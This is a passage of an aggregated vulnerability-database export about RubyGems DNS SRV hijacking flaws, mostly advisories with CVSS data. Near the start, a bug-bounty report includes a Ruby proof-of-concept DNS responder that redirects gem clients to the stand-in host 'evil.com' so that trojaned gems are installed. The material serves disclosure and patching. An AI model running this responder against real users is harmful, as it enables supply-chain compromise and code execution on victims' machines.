For\nexample, the attacker could simply modify the gem source code and trigger\ncode execution via the extensions API at install time on the client machine\n(a gem trojaning technique described by Ben Smith in his \"Hacking with\nGems\" presentation at Aloha Ruby Conference in 2012 -\nhttps://www.youtube.com/watch?v=z-5bO0Q1J9s)/\n\nThis vulnerability has the same net effect/impact as [CVE-2015-3900](https://nvd.nist.gov/vuln/detail/CVE-2015-3900) and\n[CVE-2015-4020](https://nvd.nist.gov/vuln/detail/CVE-2015-4020).\n\n**Affected method in Gem::RemoteFetcher:**\n\nhttps://github.com/rubygems/rubygems/blob/5096fa35c1ca3e0a7d175aaf9d77cd93114fd977/lib/rubygems/remote_fetcher.rb#L101-L119\n\n**PoC DNS SRV Responder:**\n\n #!/usr/bin/env ruby\n require 'rubydns'\n require 'rubydns/system'\n INTERFACES = [\n \t[:udp, \"0.0.0.0\", 53],\n \t[:tcp, \"0.0.0.0\", 53]\n ]\n Name = Resolv::DNS::Name\n IN = Resolv::DNS::Resource::IN\t\n RubyDNS::run_server(:listen => INTERFACES) do\n match(//, IN::SRV) do |transaction|\n transaction.respond!(0,0,53,\"evil.com/api.rubygems.com\")\n end\n end\n\n**Recommendations:**\n\nConsider this small patch to address the immediate attack vector...\n\n - if /\\.#{Regexp.quote(host)}\\z/ =~ target\n + if (/\\.#{Regexp.quote(host)}\\z/ =~ target) && !target.include?(\"/\")\n\nAlso, consider moving away from doing API discovery via DNS. 
Would recommend \nmoving to HTTPS, where you will have a stronger transport security chain.\n\n**References (these are not new, just references prior work here to help triage team understand impact):**\n\n- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-007/?fid=6356\n- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n- https://speakerdeck.com/claudijd/trojaned-gems-you-cant-tell-youre-using-one\n- http://blog.rubygems.org/2015/05/14/CVE-2015-3900.html", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-02T17:31:05", "type": "hackerone", "title": "RubyGems: Request Hijacking Vulnerability in RubyGems 2.6.11 and earlier", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020", "CVE-2017-0902"], "modified": "2017-08-30T23:36:42", "id": "H1:218088", "href": "https://hackerone.com/reports/218088", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-08-25T22:51:00", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not 
validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2022-05-14T01:08:49", "type": "osv", "title": "RubyGems vulnerable to DNS hijack attack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2023-08-25T22:50:12", "id": "OSV:GHSA-WP3J-RVFP-624H", "href": "https://osv.dev/vulnerability/GHSA-wp3j-rvfp-624h", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-05-04T21:41:09", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.3.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\"\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2022-05-17T00:16:50", "type": "osv", "title": "RubyGems Improper Input Validation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2023-05-04T21:41:05", "id": "OSV:GHSA-QV62-XFJ6-32XM", "href": "https://osv.dev/vulnerability/GHSA-qv62-xfj6-32xm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T06:20:49", "description": "\nSeveral vulnerabilities were discovered in Ruby 2.1.\n\n\n* [CVE-2016-2337](https://security-tracker.debian.org/tracker/CVE-2016-2337)\nType confusion exists in \\_cancel\\_eval Ruby's TclTkIp class\n method. Attacker passing different type of object than String as\n retval argument can cause arbitrary code execution.\n* [CVE-2018-1000073](https://security-tracker.debian.org/tracker/CVE-2018-1000073)\nRubyGems contains a Directory Traversal vulnerability in\n install\\_location function of package.rb that can result in path\n traversal when writing to a symlinked basedir outside of the root.\n* [CVE-2018-1000074](https://security-tracker.debian.org/tracker/CVE-2018-1000074)\nRubyGems contains a Deserialization of Untrusted Data\n vulnerability in owner command that can result in code\n execution. 
This attack appears to be exploitable via victim must\n run the gem owner command on a gem with a specially crafted YAML\n file.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2.1.5-2+deb8u5.\n\n\nWe recommend that you upgrade your ruby2.1 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-27T00:00:00", "type": "osv", "title": "ruby2.1 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2023-06-28T06:20:44", "id": "OSV:DLA-1480-1", "href": "https://osv.dev/vulnerability/DLA-1480-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T06:20:46", "description": "\nMultiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. 
The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\n\n* [CVE-2015-9096](https://security-tracker.debian.org/tracker/CVE-2015-9096)\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\n or MAIL FROM command.\n* [CVE-2016-2339](https://security-tracker.debian.org/tracker/CVE-2016-2339)\nExploitable heap overflow in Fiddle::Function.new.\n* [CVE-2016-7798](https://security-tracker.debian.org/tracker/CVE-2016-7798)\nIncorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n* [CVE-2017-0898](https://security-tracker.debian.org/tracker/CVE-2017-0898)\nBuffer underrun vulnerability in Kernel.sprintf.\n* [CVE-2017-0899](https://security-tracker.debian.org/tracker/CVE-2017-0899)\nANSI escape sequence vulnerability in RubyGems.\n* [CVE-2017-0900](https://security-tracker.debian.org/tracker/CVE-2017-0900)\nDoS vulnerability in the RubyGems query command.\n* [CVE-2017-0901](https://security-tracker.debian.org/tracker/CVE-2017-0901)\ngem installer allowed a malicious gem to overwrite arbitrary files.\n* [CVE-2017-0902](https://security-tracker.debian.org/tracker/CVE-2017-0902)\nRubyGems DNS request hijacking vulnerability.\n* [CVE-2017-0903](https://security-tracker.debian.org/tracker/CVE-2017-0903)\nMax Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n* [CVE-2017-10784](https://security-tracker.debian.org/tracker/CVE-2017-10784)\nYusuke Endoh discovered an escape sequence injection vulnerability in\n the Basic authentication of WEBrick. 
An attacker can take advantage of\n this flaw to inject malicious escape sequences to the WEBrick log and\n potentially execute control characters on the victim's terminal\n emulator when reading logs.\n* [CVE-2017-14033](https://security-tracker.debian.org/tracker/CVE-2017-14033)\nasac reported a buffer underrun vulnerability in the OpenSSL\n extension. A remote attacker could take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n* [CVE-2017-14064](https://security-tracker.debian.org/tracker/CVE-2017-14064)\nHeap memory disclosure in the JSON library.\n* [CVE-2017-17405](https://security-tracker.debian.org/tracker/CVE-2017-17405)\nA command injection vulnerability in Net::FTP might allow a\n malicious FTP server to execute arbitrary commands.\n* [CVE-2017-17742](https://security-tracker.debian.org/tracker/CVE-2017-17742)\nAaron Patterson reported that WEBrick bundled with Ruby was vulnerable\n to an HTTP response splitting vulnerability. It was possible for an\n attacker to inject fake HTTP responses if a script accepted an\n external input and output it without modifications.\n* [CVE-2017-17790](https://security-tracker.debian.org/tracker/CVE-2017-17790)\nA command injection vulnerability in lib/resolv.rb's lazy\\_initialze\n might allow a command injection attack. However untrusted input to\n this function is rather unlikely.\n* [CVE-2018-6914](https://security-tracker.debian.org/tracker/CVE-2018-6914)\nooooooo\\_q discovered a directory traversal vulnerability in the\n Dir.mktmpdir method in the tmpdir library. It made it possible for\n attackers to create arbitrary directories or files via a .. 
(dot dot)\n in the prefix argument.\n* [CVE-2018-8777](https://security-tracker.debian.org/tracker/CVE-2018-8777)\nEric Wong reported an out-of-memory DoS vulnerability related to a\n large request in WEBrick bundled with Ruby.\n* [CVE-2018-8778](https://security-tracker.debian.org/tracker/CVE-2018-8778)\naerodudrizzt found a buffer under-read vulnerability in the Ruby\n String#unpack method. If a big number was passed with the specifier @,\n the number was treated as a negative value, and an out-of-buffer read\n occurred. Attackers could read data on heaps if a script accepts an\n external input as the argument of String#unpack.\n* [CVE-2018-8779](https://security-tracker.debian.org/tracker/CVE-2018-8779)\nooooooo\\_q reported that the UNIXServer.open and UNIXSocket.open\n methods of the socket library bundled with Ruby did not check for NUL\n bytes in the path argument. The lack of check made the methods\n vulnerable to unintentional socket creation and unintentional socket\n access.\n* [CVE-2018-8780](https://security-tracker.debian.org/tracker/CVE-2018-8780)\nooooooo\\_q discovered an unintentional directory traversal in\n some methods in Dir, by the lack of checking for NUL bytes in their\n parameter.\n* [CVE-2018-1000075](https://security-tracker.debian.org/tracker/CVE-2018-1000075)\nA negative size vulnerability in ruby gem package tar header that could\n cause an infinite loop.\n* [CVE-2018-1000076](https://security-tracker.debian.org/tracker/CVE-2018-1000076)\nRubyGems package improperly verifies cryptographic signatures. 
A mis-signed\n gem could be installed if the tarball contains multiple gem signatures.\n* [CVE-2018-1000077](https://security-tracker.debian.org/tracker/CVE-2018-1000077)\nAn improper input validation vulnerability in RubyGems specification\n homepage attribute could allow malicious gem to set an invalid homepage\n URL.\n* [CVE-2018-1000078](https://security-tracker.debian.org/tracker/CVE-2018-1000078)\nCross Site Scripting (XSS) vulnerability in gem server display of homepage\n attribute.\n* [CVE-2018-1000079](https://security-tracker.debian.org/tracker/CVE-2018-1000079)\nPath Traversal vulnerability during gem installation.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2.1.5-2+deb8u4.\n\n\nWe recommend that you upgrade your ruby2.1 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-14T00:00:00", "type": "osv", "title": "ruby2.1 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780"], "modified": "2023-06-28T06:20:41", "id": "OSV:DLA-1421-1", "href": "https://osv.dev/vulnerability/DLA-1421-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:42", "description": "RubyGems make life easier for developers to distribute software to users. A vulnerability in the Ruby package manager could make life easier for hackers to redirect victims to trouble.\n\nDisclosed today by researchers at Trustwave and OpenDNS, the vulnerability, CVE-2015-3900, enables an attacker to [redirect a RubyGem client](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Attacking-Ruby-Gem-Security-with-CVE-2015-3900/>) to a gem server controlled by the attacker where additional malware or exploits can be executed.\n\nThe problem is noteworthy on several fronts. 
One in particular surfaces when clients using HTTPS can also be redirected, bypassing HTTPS verification on the original gem source.\n\n\u201cThis means that the attacker can force the user to install malicious/trojaned gems,\u201d researchers at Trustwave said.\n\nAdditional trouble was found via the RubyGems Gem Server Discovery feature that uses a DNS SRV request in order to find gem servers.\n\n\u201cThis functionality does not require that DNS replies come from the same security domain as the original gem source, allowing arbitrary redirection to attacker controlled gem servers,\u201d Trustwave said, adding that proof of concept Gem Trojaning service written by its researchers exploits the vulnerability and transparently turns a RubyGem into a Trojan as a user installs it.\n\nTrustwave, in collaboration with OpenDNS, estimates that more than a million software installations daily could be affected, extrapolating out to 438 million annually.\n\nRubyGems\u2019 maintainers have fixed the issue, but users must upgrade RubyGem clients in all Ruby environments to 2.4.8 or higher.\n\nThe breadth of those affected by the vulnerability is also going to give birth to debates over whether gems should be signed. Trustwave said that none of the top 10 gems are signed, and that [list](<https://rubygems.org/stats>) includes rake, rack, json and rails.\n\n\u201cRuby gem signing is an obvious mitigation strategy for the above mentioned transport security issues. However, gem signing is barely used in the Ruby gem ecosystem,\u201d Trustwave said. \u201cWe demonstrated that even if you are using signed gems, by using CVE-2015-3900, you must be using the HighSecurity trust policy or gems can still be trojaned in transit due to a signing downgrade attack.\u201d\n\nRubyGems are used in Ruby libraries and applications. It\u2019s a standard packaging format used by developers to build and distribute software. 
Once the vulnerability was patched, Trustwave said it identified an additional bypass that an attacker can use to redirect users to a domain that ends with the original security domain; Trustwave provided the example: attackercontrolledrubygems.org.\n\n\u201cThese issues affect the RubyGems client and any environment that embeds the RubyGems client. Ruby, JRuby, and Rubinuius have all been confirmed to embed the RubyGems client and are affected by CVE-2015-3900,\u201d Trustwave said. \u201cThe mechanism for updating to a fixed version of RubyGems also uses the same vulnerable functionality we\u2019re trying to protect.\u201d\n", "cvss3": {}, "published": "2015-06-23T09:55:51", "type": "threatpost", "title": "RubyGems Patches Serious Redirection Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2015-06-25T21:13:32", "id": "THREATPOST:47105F0F1A3DAF664EEDC82B887B86A7", "href": "https://threatpost.com/rubygems-patches-serious-redirection-vulnerability/113425/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "veracode": [{"lastseen": "2023-04-18T13:58:03", "description": "ruby is vulnerable to man-in-the-middle attack. A flaw was found in a way rubygems verified the API endpoint hostname retrieved through a DNS SRV record. 
A man-in-the-middle attacker could use this flaw to force a client to download content from an untrusted domain.\n", "cvss3": {}, "published": "2019-01-15T09:07:12", "type": "veracode", "title": "Man-in-the-Middle (MitM)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2019-05-15T06:18:13", "id": "VERACODE:11752", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-11752/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "github": [{"lastseen": "2023-09-17T01:09:24", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2022-05-14T01:08:49", "type": "github", "title": "RubyGems vulnerable to DNS hijack attack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": 
"2023-08-25T22:31:50", "id": "GHSA-WP3J-RVFP-624H", "href": "https://github.com/advisories/GHSA-wp3j-rvfp-624h", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T01:06:07", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.3.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\"\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2022-05-17T00:16:50", "type": "github", "title": "RubyGems Improper Input Validation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2023-05-04T21:14:41", "id": "GHSA-QV62-XFJ6-32XM", "href": "https://github.com/advisories/GHSA-qv62-xfj6-32xm", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2023-09-21T20:59:02", "description": "\n\nJonathan Claudius reports:\n\nRubyGems provides the ability of a domain to direct clients to a\n\t separate host that is used to fetch gems and make API calls against.\n\t This mechanism is implemented via DNS, specifically a SRV record\n\t _rubygems._tcp under the original requested domain.\nRubyGems did not validate the hostname returned in the SRV record\n\t before sending requests to it. 
This left clients open to a DNS\n\t hijack attack, whereby an attacker could return a SRV of their\n\t choosing and get the client to use it.\n\n\n", "cvss3": {}, "published": "2015-05-14T00:00:00", "type": "freebsd", "title": "rubygems -- request hijacking vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-05-14T00:00:00", "id": "A0089E18-FC9E-11E4-BC58-001E67150279", "href": "https://vuxml.freebsd.org/freebsd/a0089e18-fc9e-11e4-bc58-001e67150279.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2023-09-18T02:58:45", "description": "## Releases\n\n * Ubuntu 17.04 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * ruby1.9.1 \\- Object-oriented scripting language\n * ruby2.0 \\- Object-oriented scripting language\n * ruby2.3 \\- Object-oriented scripting language\n\nIt was discovered that Ruby DL::dlopen incorrectly handled opening \nlibraries. An attacker could possibly use this issue to open libraries with \ntainted names. This issue only applied to Ubuntu 14.04 LTS. (CVE-2009-5147)\n\nTony Arcieri, Jeffrey Walton, and Steffan Ullrich discovered that the Ruby \nOpenSSL extension incorrectly handled hostname wildcard matching. This \nissue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855)\n\nChristian Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly \nhandled certain crafted strings. An attacker could use this issue to cause \na denial of service, or possibly execute arbitrary code. 
This issue only \napplied to Ubuntu 14.04 LTS. (CVE-2015-7551)\n\nIt was discovered that Ruby Net::SMTP incorrectly handled CRLF sequences. A \nremote attacker could possibly use this issue to inject SMTP commands. \n(CVE-2015-9096)\n\nMarcin Noga discovered that Ruby incorrectly handled certain arguments in \na TclTkIp class method. An attacker could possibly use this issue to \nexecute arbitrary code. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2016-2337)\n\nIt was discovered that Ruby Fiddle::Function.new incorrectly handled \ncertain arguments. An attacker could possibly use this issue to execute \narbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2339)\n\nIt was discovered that Ruby incorrectly handled the initialization vector \n(IV) in GCM mode. An attacker could possibly use this issue to bypass \nencryption. (CVE-2016-7798)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-25T00:00:00", "type": "ubuntu", "title": "Ruby vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5147", "CVE-2015-1855", "CVE-2015-7551", "CVE-2015-9096", 
"CVE-2016-2337", "CVE-2016-2339", "CVE-2016-7798"], "modified": "2017-07-25T00:00:00", "id": "USN-3365-1", "href": "https://ubuntu.com/security/notices/USN-3365-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rubygems": [{"lastseen": "2023-05-16T15:02:04", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7\ndoes not validate the hostname when fetching gems or making API requests, which\nallows remote attackers to redirect requests to arbitrary domains via a crafted\nDNS SRV record, aka a \"DNS hijack attack.\" A flaw was found in a way rubygems verified\nthe API endpoint hostname retrieved through a DNS SRV record. A man-in-the-middle\nattacker could use this flaw to force a client to download content from an untrusted\ndomain.\n", "cvss3": {}, "published": "2015-05-14T00:00:00", "type": "rubygems", "title": "CVE-2015-3900 rubygems: DNS hijacking vulnerability in api_endpoint()", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2015-3900", "CVE-2015-3900"], "modified": "2015-05-14T00:00:00", "id": "RUBY:RUBYGEMS-UPDATE-2015-3900-122162", "href": "https://rubysec.com/advisories/2015-3900/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-21T02:33:22", "description": "RubyGems contains a flaw in the api_endpoint() function in remote_fetcher.rb\nthat is triggered when handling hostnames in SRV records. With a specially\ncrafted response, a context-dependent attacker may conduct DNS hijacking\nattacks. 
This vulnerability is due to an incomplete fix for CVE-2015-3900,\nwhich allowed redirection to an arbitrary gem server in any security domain.\n", "cvss3": {}, "published": "2015-06-08T00:00:00", "type": "rubygems", "title": "RubyGems remote_fetcher.rb api_endpoint() Function Missing SRV Record Hostname Validation Request Hijacking", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2015-4020", "CVE-2015-3900"], "modified": "2015-06-08T00:00:00", "id": "RUBY:RUBYGEMS-UPDATE-2015-4020", "href": "https://rubysec.com/advisories/2015-4020/", "cvss": {"score": 0.0, "vector": "NONE"}}], "amazon": [{"lastseen": "2023-09-21T19:12:26", "description": "**Issue Overview:**\n\nRubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900)\n\nAs discussed upstream (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478), CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\n\n \n**Affected Packages:** \n\n\nruby21\n\n \n**Issue Correction:** \nRun _yum update ruby21_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 ruby21-devel-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby21-libs-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby21-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem21-bigdecimal-1.2.4-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem21-io-console-0.4.3-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 ruby21-debuginfo-2.1.6-1.17.amzn1.i686 \n \u00a0\u00a0\u00a0 rubygem21-psych-2.0.5-1.17.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 rubygems21-2.2.3-1.17.amzn1.noarch \n \u00a0\u00a0\u00a0 rubygems21-devel-2.2.3-1.17.amzn1.noarch \n \u00a0\u00a0\u00a0 